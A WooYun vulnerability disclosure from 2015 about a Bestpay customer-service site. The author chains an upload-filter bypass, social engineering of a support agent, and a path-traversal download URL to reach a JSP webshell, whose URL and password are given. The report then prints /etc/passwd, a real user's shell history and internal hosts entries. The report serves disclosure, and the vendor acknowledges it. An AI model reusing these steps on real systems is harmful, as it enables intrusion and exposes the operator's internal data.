当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094857

漏洞标题:翼支付某站从绕过上传到任意文件下载到getshell

相关厂商:bestpay.com.cn

漏洞作者: BMa

提交时间:2015-01-31 11:56

修复时间:2015-03-17 11:58

公开时间:2015-03-17 11:58

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:14

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-31: 细节已通知厂商并且等待厂商处理中
2015-02-02: 厂商已经确认,细节仅向厂商公开
2015-02-12: 细节向核心白帽子及相关领域专家公开
2015-02-22: 细节向普通白帽子公开
2015-03-04: 细节向实习白帽子公开
2015-03-17: 细节向公众公开

简要描述:

翼支付某站从绕过上传到任意文件下载到getshell

详细说明:

站点:http://kf.bestpay.com.cn 天翼电子商务公司客服系统
与客服MM聊天:http://kf.bestpay.com.cn/zhij/imsystem/im/im_client.jsp?queueId=1011&guestId=&sessionId=&keyword=
这里有一个文件上传:

0.jpg


从图中可以看出是存在限制的,通过截断改包,绕过上传,上传jsp文件

1.jpg


上传后有一个非常严肃的问题,没办法得到shell路径:没有返回、没有类似路径、爬不到、google没用、没找到其他类似结构的站
没办法,和客服MM聊了一会儿天,<顺便说一句客服MM态度超好,帮了很大忙><真心感谢>,让她下载了该文件,并把下载的链接发送给我

http://kf.bestpay.com.cn/zhij/imsystem/download.jsp?&msgDirection=1&path=20150129113305618_1.jsp&realFileName=1.jsp


很明显,这就是一个任意文件下载,测试一下:

http://kf.bestpay.com.cn/zhij/imsystem/download.jsp?&msgDirection=1&path=/../../download.jsp&realFileName=1.jsp


2.jpg


平常的渗透思路断了<请大牛教我>,只能通过下载漏洞,分析源码了<只能下载jsp、jsp等,class等后缀不能下载 - - !>,感谢好基友小胖@subversion<小胖是一个非常棒的java、jsp开发工程师,当然也是喜欢安全的>
得到发送文件的路径:/sendfile/client/
拼接起来,得到shell:http://kf.bestpay.com.cn/zhij/imsystem/sendfile/client/20150129113305618_1.jsp 密码:jspspy

3.jpg


数据库:不脱裤是我的原则

4.jpg


貌似权限蛮大:

5.jpg


Executing: cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
#games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
#ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
#nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
webapp:x:501:501::/home/webapp:/bin/bash
kefu_remote:x:502:10::/home/kefu_remote:/bin/bash
fengkong:x:503:505::/webapp/tykf2/upload/fengkong:/sbin/nologin


Executing: cat /home/webapp/.bash_history
cd /
cd web*
ll
cd tykf
ll
cd tykf3
cd tykf*3
cd ..bin
ll
cd bin
cd ../bin
cd ..
cd webapp
cd web*
ll
rm -rf WebReport2013070901
cd ../
ll
cd in
cd bin
ll
./sh*.sh
cd ../
ll
cd web*
ll
rm -rf *2013*
ll
cd ../bin
ll
./sta*.sh
cd ../logs
tail -f *.out
cd /
cd web*
ll
cd tykf
ll
cd tykf*3
ll
cd bin
./shutdown.sh
ll
./startup.sh
ps -ef|grep java
cd /
ll
cd web*
ll
cd tykf
cd tykf*2
cd bin
ps -ef |grep java
kill -9 15894
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
cd /webapp/tykf/tykf_tomcat_4/bin
pwd
ps -ef | grep java
kill -9 12647
ps -ef | grep java
./startup.sh
cd ../
cd logs
tail -f catalina.out
ps -ef | grep java
df -h
cd /webapp/tykf/tykf_tomcat_1/logs
echo > catalina.out
df -h
tar -cvvf /webapp/tykf/data_bak/CustomerService20141126_01.tar.gz /webapp/tykf/tykf_tomcat_2/webapps/CustomerService/
cd /webapp/tykf/tykf_tomcat_4/bin
pwd
ps -ef | grep java
kill -9 22736
./startup.sh
cd ../
cd logs
tail -f catalina.out
cd ../
cd ../
cd /webapp/tykf/tykf_tomcat_2/bin
pwd
ps -ef | grep java
kill -9 24469
ps -ef | grep java
./startup.sh
ps -ef | grep java
cd ../
cd logs
tail -f catalina.out
cd /webapp/tykf/tykf_tomcat_4/work
pwd
ps -ef | grep java
pwd
kill -9 26494
ps -ef | grep java
rm -rf Catalina/
ll
cd ../
cd bin
./startup.sh
cd ../
cd logs
tail -f catalina.out
cd /
cd web*
ll
cd tykf
cd tykf*4
cd logs
tail -f *.out
cd /webapp/tykf/tykf_tomcat_4/logs
tail -f catalina.out
tail -f catalina.out
cd /
ll
cd web*
ll
cd tykf
cd tykf*4
cd bin
ps -ef |grep java
kill -9 24656
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
CD ../
cd ../
cd ../
cd tykf*2
cd bin
ps -ef |grep java
kill -9 7220
./sta*.sh
cd ../logs
tail -f *.out
df -h
df -h
tail -f *.out
cd ../
ll
cd ../
ll
cd tykf*1
cd logs
tail -f *.out
cd ../
cd bin
ps -ef |grep java
kill -9 5462
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
ps -ef |grep java
cd ../
ll
cd ../
cd tykf*2
cd ../logs
ll
cd ../
ll
cd tykf*2
cd logs
tail -f *.out
cd /webapp/tykf/tykf_tomcat_2/bin
pwd
top
pwd
ps -ef | grep java
kill -9 26605
ps -ef | grep java
./startup.sh
ps -ef | grep java
cd ../
cd logs
tail -f catalina.out
cd /
ll
cd web*
ll
cd tykf*1
cd tykf
cd tykf*1
cd logs
tail -f *.out
CD ../
cd ../
cd bin
ps -ef |grep java
kill -9 26319
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
cd /
cd web*
ll
cd tykf
cd tykf*4
cd bin
ps -ef |grep java
kill -9 27076
./sta*.sh
cd ../logs
tail -f *.out
df -h
cd /webapp/tykf/tykf_tomcat_1/logs
pwd
echo > catalina.out
cd /webapp/tykf/tykf_tomcat_4/logs
pwd
echo > catalina.out
pwd
df -h
top
pe -ef | grep java
ps -ef | grep java
ps -ef |grep java
cd /webapp/tykf/tykf_tomcat_2/bin
pwd
pwd
ps -ef | grep java
kill -9 3533
ps -ef | grep java
./startup.sh
cd ..
cd logs
tail -f catalina.out
top
free
cd /webapp/tykf/tykf_tomcat_1/bin
pwd
ps -ef | grep java
kill -9 3687
ps -ef | grep java
./startup.sh
cd ../
cd logs
tail -f catalina.out
ps -ef | grep java
ps -ef | grep java
cd /
ll
cde web*
ll
cd tykf
cd web*
ll
cd tykf
cd tykf*4
cd bin
ps -ef |grep java
kill -9 31606
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
ls
cd /
ll
cd web*
ll
cd tykf
cd tykf*1
ll
cd web*
ll
cd zhij
ll
cd im*
ll
cd ../
cd ims*
ll
cd im
ll
ll -a
rm - rf .svn
rm -fr .svn
ll
ll -a
cd ../
ll
ll -a
rm -fr .svn
ll -a
cd ../
ll -a
cd imcd g*
cd g*
ll -a
cd ../
cd /webapp/tykf/tykf_tomcat_4/bin
pwd
pwd
ps -ef | grep java
kill -9 15585
./startup.sh
ps -ef | grep java
cd ../
cd logs
tail -f catalina.out
df -h
ping 183.63.191.47
cd /
ll
cd web*
ll
cd tykf
ll
cd tykf*1
cd logs
tail ~-f *.out
tail -f *.out
cd /webapp/tykf/tykf_tomcat_4/bin
pwd
ps -ef | grep java
kill -9 22868
ps -ef | grep java
./startup.sh
cd ../
cd logs
tail -f catalina.out
ps -ef | grep java
ps -ef | grep java
df -h
cd /webapp/tykf/tykf_tomcat_4/logs
pwd
echo > catalina.out
ps -ef | grep java
cd /webapp/tykf/tykf_tomcat_1/logs
pwd
pwd
echo > catalina.out
ps -ef | grep java
ps -ef | grep java
df -h
top
cd /
ll
cd web*
ll
cd tykf
ll
cd tykf*5
cd logs
tail -f *.out
cd ../
cd bin
ps -ef |grep java
kill -9 23355
./sta*.sh
cd ../logs
tail -t *.out
tail -f *.out
cd /
ll
cd web*
ll
cd tykf
cd tykf*1
cd lgos
cd log
cd logs
tail -f *.out
tail -f *.out
ping 172.16.248.123
telnet 172.16.248.123 8090
telnet 172.16.248.123 8090
telnet 172.16.248.123 8080
cd /
ll
cd web*
ll
cd tykf
cd tykf*1
cd logs
tail -f *.out
tail -f *.out
cd /webapp/tykf/tykf_tomcat_4/bin
pwd
pwd
ps -ef | grep java
kill -9 32625
ps -ef | grep java
./startup.sh
cd ../
cd logs
ps -ef | grep java
ps -ef | grep java
tail -f catalina.out
dh -f
df -h
cd /webapp/tykf/tykf_tomcat_2/logs
pwd
echo > catalina.out
df -h
date
date
date
cd /
cd web *
cd/
dh -f
df -h
tar -cvvf /webapp/tykf/data_bak/zhij20141222_01.tar.gz /webapp/tykf/tykf_tomcat_1/webapps/zhij/
cd tar -cvvf /webapp/tykf/data_bak/CustomerService20141222_01.tar.gz /webapp/tykf/tykf_tomcat_2/webapps/CustomerService/
tar -cvvf /webapp/tykf/data_bak/CustomerService20141222_01.tar.gz /webapp/tykf/tykf_tomcat_2/webapps/CustomerService/
cd /webapp/tykf/tykf_tomcat_2
ps -ef | grep java
pwd
pwd
ps -ef | grep java
kill -9 23665
ps -ef | grep java
cd lib
cd ../
cd bin
./startup.sh
cd ../
cd logs
tail -f catalina.out
cd /webapp/tykf/tykf_tomcat_2/work
pwd
pwd
pwd
ps -ef | grep java
kill -9 341
ps -ef | grep java
rm -rf Catalina/
ll
cd ../
cd bin
./startup.sh
cd ../
cd logs
tail -f catalina.out
cd /webapp/tykf/tykf_tomcat_1/bin
pwd
ps -ef | grep java
kill -9 1997
ps -ef | grep java
./startup.sh
cd ../
cd logs
tail -f catalina.out
df -h
cd /webapp/tykf/tykf_tomcat_1/logs
pwd
echo > catalina.out
df -h
df -h
df -h
df -h
df -h
df -h
cd /webapp/tykf/tykf_tomcat_1/bin
pwd
pwd
ps -ef | grep java
ps -ef | grep java
kill -9 787
ps -ef | grep java
ps -ef | grep java
./startup.sh
cd ../
cd logs
tail -f catalina.out
cd /webapp/tykf/tykf_tomcat_1/bin
pwd
ps -ef | grep java
kill -9 10418
ps -ef | grep java
./startup.sh
cd ..
cd logs
tail -f catalina.out
ps -ef | grep java
ps -ef | grep java
ps -ef | grep java
dh -f
df -h
ps -ef | grep java
ps -ef | grep java
ps -ef | grep java
ps -ef | grep java
ps -ef | grep java
cd /
ll
cd web*
ll
cd tykf
cd tykf*3
ll
cd web*
ll
cd ../bin
ps -ef |grep java
ps -ef |grep java
kill -9 28990
./sta*.sh
cd ../logs
tail -f *.out
d /
cd /
ll
cd web*
ll
cd tykf
cd tykf*4
cd bin
ps -ef |grep java
kill -9 17366
./sta*.sh
cd ../logs
tail -f *.out
cd /
cd /
ll
cd web*
ll
cd tykf
cd tykf*1
cd bin
cd ../logs
tail -f *.out
cd ../bin
ps -ef |grep jaVA
ps -ef |grep java
kill -9 10764
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
df- h
dh -f
dh -f
df -h
df -h
df -h
df -h
df -h
df -h
df -h
df -h
df -h
df -h
df -h
cd /webapp/tykf/tykf_tomcat_1/logs
pwd
echo > catalina.out
df -h
df -h
df -h
df -h
df -h
df -h
cd /webapp/tykf/tykf_tomcat_4/logs
tail -f catalina.
tail -f catalina.out
cd /
ll
cd web*
cd tykf
cd tykf*5
cd bin
cd /webapp/tykf/tykf_tomcat_4/bin
pwd
pwd
ps -ef | grep java
kill -9 25027
ps -ef | grep java
./startup.sh
ps -ef | grep java
cd ../
cd logs
tail -f catalina.out
cd /webapp/tykf/tykf_tomcat_4/bin
pwd
pwd
ps -ef | grep java
kill -9 32504
ps -ef | grep java
./startup.sh
cd ../
cd logs
tail -f catalina.out
ps -ef | grep java
cd /
ll
cd web*
ll
cd tykf
cd tykf*5
cd bin
ps -ef |grep java
kill -9 9155
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
cd ../
cd ../
cd tykf*1
cd bin
ps -ef |grep java
kill -9 30983
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
ps -ef |grep java
tail -f *.out
cd ../
cd ../
cd tykf*5
cd logs
tail -f *.out
tail -f *.out
CD ../
cd ../
cd ../
cd tykf*4
cd logs
tail -f *.out
cd ?
cd /
ll
cd web*
ll
cd tykf
ll
cd tykf*4
cd logs
tail -f *.out
tail -f *.out
tail -f *.out
cd ../
cd /
cd web*
ll
cd tykf
ll
cd tykf*4
cd logs
tail -f *.ouy\t
tail -f *.out
tail -f *.out
tail -f *.out
df -h
top
ps -ef |grep java
cd /
ll
cd web*
ll
cd tykf
ll
cd tykf*4
cd web*
ll
ll -h
ll
cd blazer*
ll
cd ../
cd /
cd /
ps -ef |grep java
ps -ef |grep java
cd web*
ll
cd tykf
ll
cd tykf*6
cd web*
ll
cd ../
cd web*
rm -rf *
cd /
ll
cd web8
cd web*
ll
cd tykf
cd tykf*6
cd bin
ps -ef |grep java
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
date
cd /webapp/tykf/tykf_tomcat_4/bin
pwd
ps -ef | grep java
kill -9 7231
ps -ef | grep java
./startup.sh
ps -ef | grep java
cd ../
cd logs
tail -f catalina.out
cd /
cd tykf
ll
cd web*
cd tykf
ll
cd tykf86
cd tykf*6
cd logs
tail -f *.out
tail -f *.out
date
tail -f *.out
ps -ef |grep java
tail -f *.out
cd ../bin
ll
cd ../
cd bin
./sh*.sh
ps -ef |grep java
cd ../logs
tail -f *.out
tail -f *.out
tail -f *.out
ps -ef |grep java
cd ../bin
./sta*.sh
cd ../logs
tail -f *.out
cd /
cd web*
ll
cd tykf
cd tykf*6
cd logs
tail -f *.out
ps -ef |grep java
tail -f *.out
cd ../
cd bin
./sh*.sh
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
ps -ef |grep java
tail -f *.out
tail -f *.out
date
date
date
cd /
ll
cd web*
ll
cd tykf*
l
ll
cd tykf84
cd tykf84
cd tykf*4
cd logs
tail -f *.out
ls
cd /
ll
cd web*
ll
cd tykf
cd tykf*4
cd logs
tail -f *.out
tail -f *.out
tail -f *.out
cd /
ll
cd web*
ll
cd tykf
ll
cd tykf*6
cd bin
ps -ef |grep java
kill -9 14621
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
ps -ef |grep java
cd /webapp/tykf/tykf_tomcat_4/bin
pwd
ps -ef | grep java
kill -9 29427
ps -ef | grep java
./startup.sh
ps -ef | grep java
cd ../
cd logs
tail -f catalina.out
telnet 172.16.248.128 8080
telnet 172.16.248.128 8081
telnet 172.16.248.128 8080
ping http://172.16.248.128:8080
ping 172.16.248.128:8080
ping 172.16.248.128 8080
ping 172.16.248.128 8080
ping 172.16.248.128
df -h
cd /webapp/tykf/tykf_tomcat_4/logs
pwd
echo > catalina.out
echo > catalina.out
cd /webapp/tykf/tykf_tomcat_2/logs
pwd
echo > catalina.out
cd /webapp/tykf/tykf_tomcat_1/logs
pwd
echo > catalina.out
echo > catalina.out
df -h
cd /webapp/tykf/tykf_tomcat_5/logs
pwd
echo > catalina.out
df -h
ps -ef | grep java
find /webapp/tykf2/robot
find /webapp/tykf2/robot -mtime +30 -type f -name *.sh[ab] -exec rm -f {} \;
ps -ef | grep java
pwd
cd find /webapp/tykf2/robot -mtime +30 -type f -name *.sh[ab] -exec rm -f {} \;
cd /webapp/tykf2
ll
cd robot
find -type f | wc -l
cd find /webapp/tykf2/robot -mtime +30 -type f -name *.sh[ab] -exec rm -f {} \;
find /webapp/tykf2/robot -mtime +30 -type f -name *.sh[ab] -exec rm -f {} \;
find -type f | wc -l
find /webapp/tykf2/robot -type f -mtime+30 -exec rm {} \;
find /webapp/tykf2/robot -type f -mtime +30 -exec rm {} \;
pwd
find -type f | wc -l
ps -ef | grep java
pwd
pwd
find /webapp/tykf2/robot -type f -mtime +30 -exec rm {} \;
find -type f | wc -l
find /webapp/tykf2/robot -type f -mtime +30 -exec rm {} \;
find -type f | wc -l
find /webapp/tykf2/robot -type f -mtime +30 -exec rm {} \;
find -type f | wc -l
find -type f | wc -l
find /webapp/tykf2/robot -type f -mtime +30 -exec rm {} \;
find -type f | wc -l
top
df -h
cd /webapp/tykf/tykf_tomcat_4/bin
pwd
ps -ef | grep java
kill -9 16675
ps -ef | grep java
./startup.sh
ps -ef | grep java
ps -ef | grep java
cd ../
cd logs
tial -f catalina.out
tail -f catalina.out
cd /
ll
cd web*
ll
cd tykf
ll
cd tykf*5
ll
cd logs
ll -h
rm -rf 2014*.txt
ll
rm -rf l*2014*.txt
ll
rm -rf E*2014*.log
ll
echo > catalina.out
ll -h
cd ../bin
ps -ef |grep java
kill -9 28239
./sta*.sh
cd ../logs
tail -f *.out
tail -f *.out
cd ../
ll
cd ../
ll
cd tykf*2
cd logs
tail -f *.out
cde /
cd /
ll
ps -ef |grep java
cd /
ll
cd web*
ll
cd tykf
ll
cd tykf*5
cd ../
cd tykf*4
cd bin
ps -ef |grep java
kill -913880
kill -9 13880
./sta*.sh
cd ../lgosta
cd ../logs
tail -f *.out
ps -ef |grep java
ps -ef |grep java
cd /
ll
cd web*
ll
cd tykf
ll
cd tykf*6
ll
cd bin
ll
cd ../
ll
cd bin
./sh*.sh
ps -ef |grep java
./sh*.sh
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
df -h
cd /
ll
cd web*
ll
cd tykf*
ll
cd tykf*6
cd bin
ps -ef |grep java
./sh*.sh
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
cd /
ll
ps -ef |grep java
cd /
ll
ps -ef | grep sftp
ftp
ftp 127.0.0.1
ps -ef | grep java
ps -ef | grep vsftpd
su root
su root
su
su - root
command not found
service vsftpd stop
eixt
pwd
ls
grep fengkong /etc/passwd
cd /webapp/tykf2/upload/fengkong
ll -d .
cp qq??20141206104355_201412061044.jpg test123.jpg
cd ..
ll fengkong/
ll -d fengkong/
cd fengkong/
chown o+w test123.jpg
chmod o+w test123.jpg
ll test123.jpg
cd ..
exit


Executing: cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost
::1 localhost6.localdomain6 localhost6
172.17.66.11 kfdb1
172.17.66.13 kfdb2
172.17.66.12 vip_kfdb1
172.17.66.14 vip_kfdb2


漏洞证明:

到此为止,不深入

修复方案:

版权声明:转载请注明来源 BMa@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-02-02 23:47

厂商回复:

感谢检测,已经通知相关人员进行修复工作。

最新状态:

暂无